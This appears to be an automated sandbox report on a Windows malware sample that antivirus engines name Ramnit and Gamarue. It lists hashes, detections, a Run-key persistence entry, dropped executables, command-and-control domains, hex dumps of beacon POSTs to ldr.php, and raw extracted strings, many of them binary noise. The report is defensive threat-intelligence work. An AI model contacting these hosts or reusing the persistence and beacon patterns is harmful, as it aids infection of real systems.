Analysis Date2015-03-25 03:25:11
MD5ad48191ea3fbf5ab01c81242c439001c
SHA1bf3bf9c99b75292f3e09d28f201347246ef96386

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 4d45cea78f3ab9f4fead024bd33ce5a1 sha1: 4f574f1ea1198062053208332d2fbfd95fb1563d size: 59392
Section.rdata md5: 8750b71644937771d981c5b88d979fe6 sha1: 5155c07b3db29023c0fab9a87185a614484e44aa size: 20992
Section.data md5: e6d38ab08a9fe9cbad2d493ca324a0c0 sha1: 41675827a2fa71ab58afa301fe7a2dde3c720ca4 size: 15360
Section.rsrc md5: a0a5477372f95d1c1551b8a0a0396ef5 sha1: 21a04518635140f4169189c54fda69374ff0a7ce size: 186880
Section.text md5: ce20bd0de23341e5ee5f947601347b86 sha1: 29035c2d84b1b96eea55fa41cd5a14d46a654fb3 size: 248320
Timestamp2013-04-14 15:26:01
Pdb pathc:\winter\Set\Bottom\Up\value\wild\industry\Support\nearcare.pdb
PEhash1bd6e1258d4e49205c002dd3d2da675d73457c1f
IMPhashb2498eed3c3aa5befc085379b8319a74
AV360 SafeVirus.Win32.Ramnit.A
AVAd-AwareTrojan.Gamarue.AP
AVAlwil (avast)RmnDrp:Win32:RmnDrp
AVArcabit (arcavir)Trojan.Gamarue.AP
AVAuthentiumW32/Ramnit.E
AVAvira (antivir)W32/Ramnit.C
AVBullGuardTrojan.Gamarue.AP
AVCA (E-Trust Ino)Win32/Ramnit.C
AVCAT (quickheal)W32.Ramnit.BA
AVClamAVW32.Ramnit-1
AVDr. WebBackDoor.Andromeda.178
AVEmsisoftTrojan.Gamarue.AP
AVEset (nod32)Win32/Ramnit.H virus
AVFortinetW32/Ramnit.C
AVFrisk (f-prot)W32/Ramnit.E
AVF-SecureTrojan.Gamarue.AP
AVGrisoft (avg)Win32/Zbot.F
AVIkarusTrojan-Downloader.Win32.Andromeda
AVK7Virus ( 001d9d511 )
AVKaspersky 2015Virus.Win32.Nimnul.a
AVMalwareBytesVirus.Ramnit
AVMcafeeW32/Ramnit.a
AVMicrosoft Security EssentialsVirus:Win32/Ramnit.J
AVMicroWorld (escan)Trojan.Gamarue.AP
AVRisingWin32.Mgr.a
AVSophosW32/Ramnit-A
AVSymantecW32.Ramnit.B!inf
AVTrend MicroPE_RAMNIT.DEN
AVVirusBlokAda (vba32)Virus.Win32.Nimnul.b

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\bf3bf9c99b75292f3e09d28f201347246ef96386mgr.exe
Creates ProcessC:\bf3bf9c99b75292f3e09d28f201347246ef96386mgr.exe
Creates ProcessC:\WINDOWS\system32\wuauclt.exe

Process
↳ C:\bf3bf9c99b75292f3e09d28f201347246ef96386mgr.exe

Process
↳ C:\WINDOWS\system32\wuauclt.exe

RegistryHKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\36874 ➝
C:\Documents and Settings\All Users\Local Settings\Temp\cczzym.exe\\x00
Creates FileC:\Documents and Settings\All Users\Local Settings\Temp\cczzym.exe
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates Mutex3227095050

Network Details:

DNSwww.update.microsoft.com.nsatc.net
Type: A
134.170.58.222
DNSwww.update.microsoft.com.nsatc.net
Type: A
65.55.50.189
DNShzmksreiuojy.in
Type: A
195.22.26.253
DNShzmksreiuojy.in
Type: A
195.22.26.254
DNShzmksreiuojy.in
Type: A
195.22.26.231
DNShzmksreiuojy.in
Type: A
195.22.26.252
DNShzmksreiuojy.ru
Type: A
195.22.26.231
DNShzmksreiuojy.ru
Type: A
195.22.26.252
DNShzmksreiuojy.ru
Type: A
195.22.26.253
DNShzmksreiuojy.ru
Type: A
195.22.26.254
DNShzmksreiuojy.biz
Type: A
69.195.129.70
DNShzmksreiuojy.nl
Type: A
176.58.104.168
DNSwww.update.microsoft.com
Type: A
DNShzmksreiuojy.com
Type: A
HTTP POSThttp://8.8.8.8/xxxxxxxxx.php
User-Agent: Mozilla/4.0
HTTP POSThttp://hzmksreiuojy.in/ldr.php
User-Agent: Mozilla/4.0
HTTP POSThttp://hzmksreiuojy.ru/ldr.php
User-Agent: Mozilla/4.0
HTTP POSThttp://hzmksreiuojy.biz/ldr.php
User-Agent: Mozilla/4.0
HTTP POSThttp://hzmksreiuojy.nl/ldr.php
User-Agent: Mozilla/4.0
Flows TCP192.168.1.1:1031 ➝ 134.170.58.222:80
Flows TCP192.168.1.1:1032 ➝ 8.8.8.8:80
Flows UDP192.168.1.1:1033 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1034 ➝ 195.22.26.253:80
Flows UDP192.168.1.1:1035 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1036 ➝ 195.22.26.231:80
Flows UDP192.168.1.1:1037 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1038 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1039 ➝ 69.195.129.70:80
Flows UDP192.168.1.1:1040 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1041 ➝ 176.58.104.168:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7878 78787878 7878782e   POST /xxxxxxxxx.
0x00000010 (00016)   70687020 48545450 2f312e31 0d0a486f   php HTTP/1.1..Ho
0x00000020 (00032)   73743a20 382e382e 382e380d 0a557365   st: 8.8.8.8..Use
0x00000030 (00048)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000040 (00064)   2f342e30 0d0a436f 6e74656e 742d5479   /4.0..Content-Ty
0x00000050 (00080)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000060 (00096)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x00000070 (00112)   636f6465 640d0a43 6f6e7465 6e742d4c   coded..Content-L
0x00000080 (00128)   656e6774 683a2038 340d0a43 6f6e6e65   ength: 84..Conne
0x00000090 (00144)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x000000a0 (00160)   75707163 68437338 7646544b 464f566d   upqchCs8vFTKFOVm
0x000000b0 (00176)   6e494b47 4977694c 7258387a 554e3638   nIKGIwiLrX8zUN68
0x000000c0 (00192)   54337971 76685175 32547165 74516e33   T3yqvhQu2TqetQn3
0x000000d0 (00208)   71497937 51366270 54664455 74594966   qIy7Q6bpTfDUtYIf
0x000000e0 (00224)   745a3333 4e423845 4a673867 396d5933   tZ33NB8EJg8g9mY3
0x000000f0 (00240)   71773d3d                              qw==

0x00000000 (00000)   504f5354 202f6c64 722e7068 70204854   POST /ldr.php HT
0x00000010 (00016)   54502f31 2e310d0a 486f7374 3a20687a   TP/1.1..Host: hz
0x00000020 (00032)   6d6b7372 6569756f 6a792e69 6e0d0a55   mksreiuojy.in..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038340d 0a436f6e   -Length: 84..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 73387646 544b464f   ..upqchCs8vFTKFO
0x000000b0 (00176)   566d6e49 4b474977 694c7258 387a554e   VmnIKGIwiLrX8zUN
0x000000c0 (00192)   36385433 79717668 51753254 71657451   68T3yqvhQu2TqetQ
0x000000d0 (00208)   6e337149 79375136 62705466 44557459   n3qIy7Q6bpTfDUtY
0x000000e0 (00224)   4966745a 33334e42 38454a67 3867396d   IftZ33NB8EJg8g9m
0x000000f0 (00240)   59337177 3d3d                         Y3qw==

0x00000000 (00000)   504f5354 202f6c64 722e7068 70204854   POST /ldr.php HT
0x00000010 (00016)   54502f31 2e310d0a 486f7374 3a20687a   TP/1.1..Host: hz
0x00000020 (00032)   6d6b7372 6569756f 6a792e72 750d0a55   mksreiuojy.ru..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038340d 0a436f6e   -Length: 84..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 73387646 544b464f   ..upqchCs8vFTKFO
0x000000b0 (00176)   566d6e49 4b474977 694c7258 387a554e   VmnIKGIwiLrX8zUN
0x000000c0 (00192)   36385433 79717668 51753254 71657451   68T3yqvhQu2TqetQ
0x000000d0 (00208)   6e337149 79375136 62705466 44557459   n3qIy7Q6bpTfDUtY
0x000000e0 (00224)   4966745a 33334e42 38454a67 3867396d   IftZ33NB8EJg8g9m
0x000000f0 (00240)   59337177 3d3d                         Y3qw==

0x00000000 (00000)   504f5354 202f6c64 722e7068 70204854   POST /ldr.php HT
0x00000010 (00016)   54502f31 2e310d0a 486f7374 3a20687a   TP/1.1..Host: hz
0x00000020 (00032)   6d6b7372 6569756f 6a792e62 697a0d0a   mksreiuojy.biz..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   6c6c612f 342e300d 0a436f6e 74656e74   lla/4.0..Content
0x00000050 (00080)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000060 (00096)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000070 (00112)   6c656e63 6f646564 0d0a436f 6e74656e   lencoded..Conten
0x00000080 (00128)   742d4c65 6e677468 3a203834 0d0a436f   t-Length: 84..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000000a0 (00160)   0a0d0a75 70716368 43733876 46544b46   ...upqchCs8vFTKF
0x000000b0 (00176)   4f566d6e 494b4749 77694c72 58387a55   OVmnIKGIwiLrX8zU
0x000000c0 (00192)   4e363854 33797176 68517532 54716574   N68T3yqvhQu2Tqet
0x000000d0 (00208)   516e3371 49793751 36627054 66445574   Qn3qIy7Q6bpTfDUt
0x000000e0 (00224)   59496674 5a33334e 4238454a 67386739   YIftZ33NB8EJg8g9
0x000000f0 (00240)   6d593371 773d3d                       mY3qw==

0x00000000 (00000)   504f5354 202f6c64 722e7068 70204854   POST /ldr.php HT
0x00000010 (00016)   54502f31 2e310d0a 486f7374 3a20687a   TP/1.1..Host: hz
0x00000020 (00032)   6d6b7372 6569756f 6a792e6e 6c0d0a55   mksreiuojy.nl..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038340d 0a436f6e   -Length: 84..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 73387646 544b464f   ..upqchCs8vFTKFO
0x000000b0 (00176)   566d6e49 4b474977 694c7258 387a554e   VmnIKGIwiLrX8zUN
0x000000c0 (00192)   36385433 79717668 51753254 71657451   68T3yqvhQu2TqetQ
0x000000d0 (00208)   6e337149 79375136 62705466 44557459   n3qIy7Q6bpTfDUtY
0x000000e0 (00224)   4966745a 33334e42 38454a67 3867396d   IftZ33NB8EJg8g9m
0x000000f0 (00240)   59337177 3d3d3d                       Y3qw===


Strings
.
.
.
.
-e-
. 
\
CC.
 
.
D.
.
\
{----}

%2Tb
=4|J
                                 H
         (((((                  H
?H=a
h/GIAXc
         h((((                  H
h%%k
jjjjjj
P5j=
,pcO
$S8C
^wZb
                          
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
0@ H(2
0SSSSS
{0VSb#
0/$ $Z
)=`1:1
15#4M"
1cn8x}
:1}"Eq)
]1O.NO
1yEE$$
\(1YX0
	2D[UZN
[2EwE"
2Q1W)0b
2SFO_f
33EE33/
{37=O+qP
3EEEEE
+3HB@2DG
%%$3$M
3N3	EE
3UEE$$M
@&3VuU
;,3@YK
*3y wF+
&3Z3;3
('40Z`V
:=4[d=
4EE33g
4KMh6xB
4U?Z0	i
4	ynD|
-4zbT|
5:7L^&
5-hi>H
|5Q-Y*
,68M$$I(
6B2"!L
6EJ+`Yd
6gBCts
6h$dLS
6~HJt?
{6#r|=9S
6sPnN{
/6tPEC
7dsgh^
`7>KO2
}~%8%<
8d	$j5}
8evoBh
`8=HRr$gr
<8J%Ml
8Jz3V~
;8$p3]
8)Ra=K
?8Ru4[
8VVVVV
9A_nNb
9-+J>v
'9;o)a
:9/XQq
a?33$$
a8j@2p
!AA-9(
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
Aje=BP
An application has made an attempt to load the C runtime library incorrectly.
a-|q:*n
a|S+!F
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD`
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<at9<rt,<wt
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
.?AVCHandleMap@@
*|%AXI
,AZHl.]
AZL L*
A-zN*|
+@AzwrE-
BC"&e&
blg9}d
bmp	+%
Bn:3X5b
B Od(l
=B_'}&$p
^^bpH_
BPix;&
BX`-b90F
C3?uTu
=C}ab)Q
$%c@E#
CloseHandle
C!@M'$
Cm<<{QI
CoCreateInstance
CoInitialize
CONOUT$
CorExitProcess
CoUninitialize
&{[Cp'
CreateFileA
CreateProcessA
C?}|rhKYFcZq
- CRT not initialized
c:\winter\Set\Bottom\Up\value\wild\industry\Support\nearcare.pdb
c\XI.-&
c-~zp`
d)1tu"
@.data
dddd, MMMM dd, yyyy
=dd_j"
December
DecodePointer
DeleteCriticalSection
DgCYfB
d-h0~O
DOMAIN error
dPq#jH$
 #DSy&
|\Dx{-
%dybQs
e{"_A}
E#^AAN
ed3<x/
e!f(]R
e>i{Pf
|Em/vE%%
En2GD 
EncodePointer
EnterCriticalSection
"([e>	R
e(u;Ao
Euuuu3M
ExitProcess
eXYy\~M2
February
F\= fA
F@~;K"
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
 ]/+Fo
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
Friday
fs,Cxg
FVh0	A
)G1eWP\]
g+2{jX3t7
gA	TG`j
g<{*CI3
GetACP
GetActiveWindow
GetCommandLineA
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
-G}h:)
gl&F0 
g*?@s>
guide six
GWh0	A
hAIRW=*
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
$|HF^m
H}+/G*
h'h-AJ
HH:mm:ss
HR>.99
h,[w*kh
?>HyK`
HY_^Z[
i0,)RO
"\i	3I
i7?|-8
\:\\ifa
.ij^jIpy2N
InitializeCriticalSection
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
IReT?#
IsDebuggerPresent
IsValidCodePage
iY0Qze
J"*"AIA
JanFebMarAprMayJunJulAugSepOctNovDec
January
/j~F,8SX
jF<-uH
j`hhFA
j>i{"_
j@j ^V
{(|JnIj
*'^JV"
Kbmcqg
kB_PW#
Kc3+nf
kernel32.dll
KERNEL32.dll
KERNEL32.DLL
>kK|6AV)(|
[KrIg`
<KysV}h&
L"3E"]
+ L8A6
L9=|SI
=lBKhyE
>}lC1*V
LCMapStringA
LCMapStringW
LeaveCriticalSection
leO5A6F
{#LF:V
=lI+PbM
~-Ln#6!
LoadLibraryA
_L:_=S
L{U(?r
m3~aUWl*A
!mc\**O
MessageBoxA
mgr.exe
mh3t3i
Microsoft Visual C++ Runtime Library
.mixcrt
M',K'@
m}l/ske
Mlu*s,0
MM/dd/yy
Monday
M.pW+(
mscoree.dll
ms|Y^{m
MultiByteToWideChar
mx7P8I/
|^.,_n
nAbjXx
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
NYFOeU
.nyGex
{O_?4x
o5oNH8u
o.;"+5Y
\`o7_.j
October
$O$$$EE
o]g(~@
Oj7]zf
ole32.dll
Omo8]/J1
`on*Z$
OpenMutexA
o%ssEqLVVQ
O=S`UI
|o`w;#
|OZ#>ML
P0v9P#
p*9=sS
[P%b;/
^PgeAD
P-H7H9
=~PJ0N%
Please contact the application's support team for more information.
|pP]CO
PPPPPPPP
PrepareTape
Program: 
<program name unknown>
- pure virtual function call
Qa^;g-4
Q:efZ{
q?F^_d
QK-DfV
=Ql^Xa
 qn{J?
QueryPerformanceCounter
Q|&W8,
raD1)u
RbO?Nn
`.rdata
ReadFile
REEEE{S
R*g)R*
RnnCW_
RSDSKG
.RtK 3
RtlUnwind
runtime error 
Runtime Error!
]R/*ygy
Rz_2awu
Saturday
SB]1Wt
September
SetEndOfFile
SetFilePointer
SetHandleCount
SetLastError
SetStdHandle
SetUnhandledExceptionFilter
SING error
SL%=xy
?SO|Wk
|] sPh}d#
=|S/QI
SrdF_?
SRQWVj
^SSSSS
|{sUI$
Sunday
SunMonTueWedThuFriSat
:s?!X:
szi8V~6
t$$%%]
t^9(uZ
tD9(u@
TerminateProcess
t>eUwqi
@.text
tGHt.Ht&
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
tJy|9"c
< tK<	tG
TKZ=YB	
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
@to@e@
ToIf:I
t#SSUP
t:T1ai
_tt333
ttECEa
t$<"u	3
Tuesday
;t$,v-
t$$VSS
tVzqS3<
t+WWVPV
tX%%EE
T)zl	C+
U[$=$33
Ugm)v5
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UNICODE
UQPXY]Y[
&u*r]b
URPQQh(\@
USER32.DLL
UTF-16LE
Utyn.k
uu$$;$Q$
uuuDt%
%U`VDw
V9={T/
v!Al-}
vhUD2V
VirtualAlloc
VirtualFree
VirtualProtect
V+JNh^
VMX>&L
v	N+D$
([V}_nE=
?vvNlWxmO[
VWQRSj
vX{0QK
,;?w1	}
w3>3uu
w.7\=/
W*}Bo*
|wc#*DluM
Wednesday
WideCharToMultiByte
WITpt]6R
WJ%!\,4qp"
*'W`K?
W(LRvaRP
<": %Wo
WriteConsoleA
WriteConsoleW
WriteFile
+wrLPTAG
`#~W}S
wv$lO4*
}w&"W2/
>WWR4!
;$X8:O\V
xb8i2Q
xgNLuA
X^OV{2
Xw>S*A
xYC#~0
xY`j{V
Y4=1_'+
yAc-+8
"y%,Az
Y^%#bH
y-cHrw3
y"{E"c
y: ed3
youkind
!_YT]_
>=Yt/j
yw=y=S2
_^][YY
YYu-9D$
YYuTVWh*
Z}5o%s
Z'8!by
ZB.XOe]U
zb,>;z
Zd"XA}
!(/=zF
{Zg:X9
ZoBW-I
z@q-s.
ZRVYF{
zthwk0
Zz\$c]